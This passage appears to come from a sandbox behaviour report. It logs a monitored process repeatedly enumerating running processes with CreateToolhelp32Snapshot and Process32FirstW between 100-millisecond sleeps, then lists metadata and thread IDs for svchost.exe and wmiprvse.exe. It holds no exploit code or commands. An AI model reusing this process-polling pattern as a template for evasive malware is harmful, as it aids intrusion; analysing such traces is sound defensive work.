0xcd4 [0299.427] Process32FirstW (in: hSnapshot=0xcd4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.434] Sleep (dwMilliseconds=0x64) [0299.535] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcd8 [0299.537] Process32FirstW (in: hSnapshot=0xcd8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.542] Sleep (dwMilliseconds=0x64) [0299.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcdc [0299.645] Process32FirstW (in: hSnapshot=0xcdc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.650] Sleep (dwMilliseconds=0x64) [0299.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xce0 [0299.754] Process32FirstW (in: hSnapshot=0xce0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.760] Sleep (dwMilliseconds=0x64) [0299.862] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xce4 [0299.863] Process32FirstW (in: hSnapshot=0xce4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.869] Sleep (dwMilliseconds=0x64) [0299.971] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xce8 [0299.973] Process32FirstW (in: hSnapshot=0xce8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.978] Sleep (dwMilliseconds=0x64) [0300.081] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcec [0300.082] Process32FirstW (in: hSnapshot=0xcec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.087] Sleep (dwMilliseconds=0x64) [0300.190] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcf0 [0300.191] Process32FirstW (in: hSnapshot=0xcf0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.197] Sleep (dwMilliseconds=0x64) [0300.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcf4 [0300.305] Process32FirstW (in: hSnapshot=0xcf4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.311] Sleep (dwMilliseconds=0x64) [0300.408] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcf8 [0300.410] Process32FirstW (in: hSnapshot=0xcf8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.415] Sleep (dwMilliseconds=0x64) [0300.517] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xcfc [0300.519] Process32FirstW (in: hSnapshot=0xcfc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.524] Sleep (dwMilliseconds=0x64) [0300.627] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd00 [0300.628] Process32FirstW (in: hSnapshot=0xd00, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.633] Sleep (dwMilliseconds=0x64) [0300.736] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd04 [0300.737] Process32FirstW (in: hSnapshot=0xd04, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.742] Sleep (dwMilliseconds=0x64) [0300.845] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd08 [0300.851] Process32FirstW (in: hSnapshot=0xd08, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.856] Sleep (dwMilliseconds=0x64) [0300.954] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd0c [0300.956] Process32FirstW (in: hSnapshot=0xd0c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.961] Sleep (dwMilliseconds=0x64) [0301.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd10 [0301.065] Process32FirstW (in: hSnapshot=0xd10, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.070] Sleep (dwMilliseconds=0x64) [0301.173] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd14 [0301.174] Process32FirstW (in: hSnapshot=0xd14, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.182] Sleep (dwMilliseconds=0x64) [0301.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd18 [0301.283] Process32FirstW (in: hSnapshot=0xd18, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.291] Sleep (dwMilliseconds=0x64) [0301.391] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd1c [0301.393] Process32FirstW (in: hSnapshot=0xd1c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.398] Sleep (dwMilliseconds=0x64) [0301.501] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd20 [0301.502] Process32FirstW (in: hSnapshot=0xd20, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.508] Sleep (dwMilliseconds=0x64) [0301.609] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd24 [0301.611] Process32FirstW (in: hSnapshot=0xd24, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.616] Sleep (dwMilliseconds=0x64) [0301.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd28 [0301.720] Process32FirstW (in: hSnapshot=0xd28, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.728] Sleep (dwMilliseconds=0x64) [0301.828] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd2c [0301.829] Process32FirstW (in: hSnapshot=0xd2c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.835] Sleep (dwMilliseconds=0x64) [0301.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd30 [0301.939] Process32FirstW (in: hSnapshot=0xd30, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0301.944] Sleep (dwMilliseconds=0x64) [0302.046] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd34 [0302.048] Process32FirstW (in: hSnapshot=0xd34, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.053] Sleep (dwMilliseconds=0x64) [0302.157] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd38 [0302.159] Process32FirstW (in: hSnapshot=0xd38, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.164] Sleep (dwMilliseconds=0x64) [0302.265] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd3c [0302.266] Process32FirstW (in: hSnapshot=0xd3c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.271] Sleep (dwMilliseconds=0x64) [0302.374] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd40 [0302.376] Process32FirstW (in: hSnapshot=0xd40, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.382] Sleep (dwMilliseconds=0x64) [0302.483] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd44 [0302.484] Process32FirstW (in: hSnapshot=0xd44, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.490] Sleep (dwMilliseconds=0x64) [0302.592] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd48 [0302.593] Process32FirstW (in: hSnapshot=0xd48, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.599] Sleep (dwMilliseconds=0x64) [0302.754] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4c [0302.756] Process32FirstW (in: hSnapshot=0xd4c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0302.761] Sleep (dwMilliseconds=0x64) Process: id = "17" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x25e70000" os_pid = "0x364" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "15" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000daca" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 170 os_tid = 0x654 Thread: id = 171 os_tid = 0x650 Thread: id = 172 os_tid = 0x63c Thread: id = 173 os_tid = 0x610 Thread: id = 174 os_tid = 0x350 Thread: id = 175 os_tid = 0x330 Thread: id = 176 os_tid = 0x338 Thread: id = 177 os_tid = 0x31c Thread: id = 178 os_tid = 0x7e8 Thread: id = 179 os_tid = 0x7e4 Thread: id = 180 os_tid = 0x7dc Thread: id = 181 os_tid = 0x7d8 Thread: id = 182 os_tid = 0x7d0 Thread: id = 183 os_tid = 0x7c4 Thread: id = 184 os_tid = 0x7bc Thread: id = 185 os_tid = 0x7b4 Thread: id = 186 os_tid = 0x7a8 Thread: id = 187 os_tid = 0x7a4 Thread: id = 188 os_tid = 0x79c Thread: id = 189 os_tid = 0x78c Thread: id = 190 os_tid = 0x770 Thread: id = 191 os_tid = 0x218 Thread: id = 192 os_tid = 0x42c Thread: id = 193 os_tid = 0x4a0 Thread: id = 194 os_tid = 0x450 Thread: id = 195 os_tid = 0x444 Thread: id = 196 os_tid = 0x424 Thread: id = 197 os_tid = 0x420 Thread: id = 198 os_tid = 0x41c Thread: id = 199 os_tid = 0x414 Thread: id = 200 os_tid = 0x128 Thread: id = 201 os_tid = 0x3c8 Thread: id = 202 os_tid = 0x3f4 Thread: id = 203 os_tid = 0x3e8 Thread: id = 204 os_tid = 0x3dc Thread: id = 205 os_tid = 0x384 Thread: id = 206 os_tid = 0x380 Thread: id = 207 os_tid = 0x37c Thread: id = 208 os_tid = 0x378 Thread: id = 209 os_tid = 0x370 Thread: id = 210 os_tid = 0x368 Thread: id = 211 os_tid = 0x5dc Thread: id = 212 os_tid = 0x5bc Thread: id = 213 os_tid = 0x5b8 Thread: id = 214 os_tid = 0x750 Thread: id = 215 os_tid = 0x74c Thread: id = 216 os_tid = 0x26c Thread: id = 243 os_tid = 0x5d0 Thread: id = 244 os_tid = 0x30c Thread: id = 245 os_tid = 0x334 Thread: id = 246 os_tid = 0x308 Thread: id = 247 os_tid = 0x5ac Thread: id = 248 os_tid = 0x724 Thread: id = 249 os_tid = 0x440 Thread: id = 250 os_tid = 0x720 Thread: id = 251 os_tid = 0x638 Thread: id = 252 os_tid = 0x64 Thread: id = 254 os_tid = 0x26c Thread: id = 255 os_tid = 0x74c Thread: id = 257 os_tid = 0x5bc Process: id = "18" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x726e9000" os_pid = "0x7fc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "17" os_parent_pid = "0x24c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0002ea2a" [0xc000000f] Thread: id = 217 os_tid = 0x48c Thread: id = 218 os_tid = 0x508 Thread: id = 219 os_tid = 0x488 Thread: id = 220 os_tid = 0x4fc Thread: id = 221 os_tid = 0x314 Thread: id = 222 os_tid = 0x5e8 Thread: id = 223 os_tid = 0x4e8 Thread: id = 224 os_tid = 0x744 Thread: id = 225 os_tid = 0x304 Thread: id = 253 os_tid = 0x630